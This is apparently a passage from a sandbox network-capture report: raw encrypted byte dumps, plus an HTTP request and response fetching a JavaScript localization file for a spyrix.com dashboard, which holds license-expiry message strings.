2024-10-02 04:11:40 UTC	4096	IN	Data Raw: 16 09 71 64 d8 70 53 52 10 0b 00 2b 66 55 ed 3f a0 37 03 56 22 c8 8a f1 af 29 b1 c8 aa 17 81 f0 09 e3 66 8e b5 e3 f6 31 cf a4 70 c4 7d d3 e0 ef 53 c3 d3 da 86 2c 53 7f 13 c0 8a 7d 7d 5b b9 1b 9f 3d 21 78 54 f0 79 52 a3 bd 75 69 57 95 d0 d1 b1 b2 67 45 14 0e 99 49 f8 3f 6a c5 ca dd fd 2e 41 e5 e1 65 b6 d6 46 de a7 60 4d 6f f6 04 ca a7 59 09 e9 5f 63 76 2c 71 f0 a2 ed 54 39 15 18 4a 84 fe be ad f3 5b 52 64 04 38 b1 6d fd 93 f8 be b4 1e b3 66 3e 9c 4d 8b 2e f9 e3 52 54 ed f0 49 ea f6 f9 c0 58 9d 60 63 93 0d a6 43 20 1d b6 ed 50 18 62 82 2c 3a 83 f0 db 8a 2e 58 1a 6d 76 ad 6b 93 04 50 74 fd cc 7e 68 c8 ba 63 2b bf 84 cc 32 83 4b 69 32 da 7d 7e 87 9d a0 f9 51 78 7e 89 e5 ff 09 e4 95 1b 4c 69 1e 41 52 ae dd a8 8f 2b b4 a6 03 f2 fa a9 f4 18 52 3f 8d 2b 86 5a 9f Data Ascii: qdpSR+fU?7V")f1p}S,S}}[=!xTyRuiWgEI?j.AeF`MoY_cv,qT9J[Rd8mf>M.RTIX`cC Pb,:.XmvkPt~hc+2Ki2}~Qx~LiAR+R?+Z
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: 60 68 ac 11 35 d7 4e 14 99 55 0d 76 65 42 50 6b ca e2 ff 72 ab 3d d9 fe 5a f8 7c 1f f9 fa a2 8a 9c db a6 93 ad 03 30 ee b7 ab 89 16 41 4e a8 22 93 36 77 ed 0d d3 39 55 c7 a2 d7 7e 2a df 5a 09 b1 81 a6 61 e8 37 93 f6 b8 b7 51 34 25 b7 de b8 b8 23 ec 19 46 a3 77 08 fe 8a 81 89 26 6a 51 f3 a1 1f 75 27 d9 e3 a9 f1 63 c2 35 71 27 7d b6 71 dd 9d c5 dc 8e 27 f2 2d 1f 32 e4 6b 94 cc 19 f7 d3 66 e2 ff 65 dc a5 f7 eb 04 7a bc 7f 82 3a bd a5 86 83 f8 ea 71 0b 73 e0 93 92 f5 c2 58 20 8e 3d dd f0 65 4b 9c 47 28 a2 7a c6 6d cd a4 4c 9f 46 5d b6 ec 66 56 bc 50 98 11 f7 7b ed b2 aa e9 4b e2 b6 4c 1f 5f 2a 4b 24 8a f3 cc 2d 59 4a 5d 32 2a 6e fa f4 1b 99 1d 2c f3 ff be 6c da 84 e7 61 69 96 4c e4 53 28 4c d4 2c f9 45 a9 5b 26 0e 40 fc 4d 24 03 34 c3 10 1b ac 84 ed 40 87 57 Data Ascii: `h5NUveBPkr=Z\|0AN"6w9U~Za7Q4%#Fw&jQu'c5q'}q'-2kfez:qsX =eKG(zmLF]fVP{KL_K$-YJ]2*n,laiLS(L,E[&@M$4@W
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: e0 9e 42 c0 e8 74 10 8f 1f 70 45 7d 5c 4f dc 07 e8 42 dd 78 a3 e3 3f 54 38 26 31 0e 7c 4c 3f cb 0b d6 ce 84 de b3 45 c6 5a 9a ea 4d 7f 32 cb cc 8b f3 6a 99 7f 9a ea 3f 36 ea d8 88 ed 1e b6 1c 30 1b ff 1c 4b 65 8c e4 80 60 13 39 a6 7c fd ec 2f 3a 41 e9 f1 57 55 98 94 c5 a4 16 9d a8 23 c6 9e 01 fc 83 2c eb 5c 2b 84 a5 12 a3 68 83 60 76 d4 ab be 11 79 e0 03 e2 0f 22 2b ff 7d 05 69 1e b8 4b 89 81 a4 8c d7 22 d1 6b 5e 86 25 f1 12 6e e0 49 42 5d 1e 9f 9f 57 97 70 07 80 f0 90 32 90 2f 27 31 57 4e 5f 48 fd 06 13 26 bb cb 0b fc 70 40 80 c5 f0 c5 43 5a 0a 14 df 63 9d 46 22 4d f5 d1 46 91 c8 a3 8e 93 52 29 89 9c 1c c0 ff 9c ce fe 6b 50 ef f6 56 4c a7 49 a4 2d 94 b6 3d 3d e6 35 00 9e 23 54 be 5a df e6 7f f3 cd 37 eb 91 b8 97 04 3c 0d 1b f1 60 5e 5f 8c 45 15 13 1d eb Data Ascii: BtpE}\OBx?T8&1\|L?EZM2j?60Ke`9\|/:AWU#,\+h`vy"+}iK"k^%nIB]Wp2/'1WN_H&p@CZcF"MFR)kPVLI-==5#TZ7<`^_E

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:40 UTC	626	OUT	GET /dashboard30/assets/en-5393c481.js HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://dashboard.spyrix.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:40 UTC	392	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:40 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 1098 Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: "66fa817d-44a" Access-Control-Allow-Origin: https://dashboard.spyrix.com Cache: STALE X-Cached-Since: 2024-10-01T22:49:56+00:00 X-Node: m9p-up-gc69 Accept-Ranges: bytes
2024-10-02 04:11:40 UTC	1098	IN	Data Raw: 63 6f 6e 73 74 20 6f 3d 22 63 6f 6e 76 65 6e 69 65 6e 74 22 2c 65 3d 22 4d 61 69 6e 22 2c 6e 3d 7b 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 2c 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 2c 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 3a 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 2c 22 50 6c 65 61 73 65 20 70 75 72 63 68 61 73 65 20 61 20 6c 69 63 65 6e 73 65 20 74 6f 20 61 63 63 65 73 73 20 79 6f 75 72 20 64 61 74 61 22 3a 22 50 6c 65 61 73 65 20 Data Ascii: const o="convenient",e="Main",n={"The license period has expired":"The license period has expired","The trial period is expired":"The trial period is expired","Your data is safe":"Your data is safe","Please purchase a license to access your data":"Please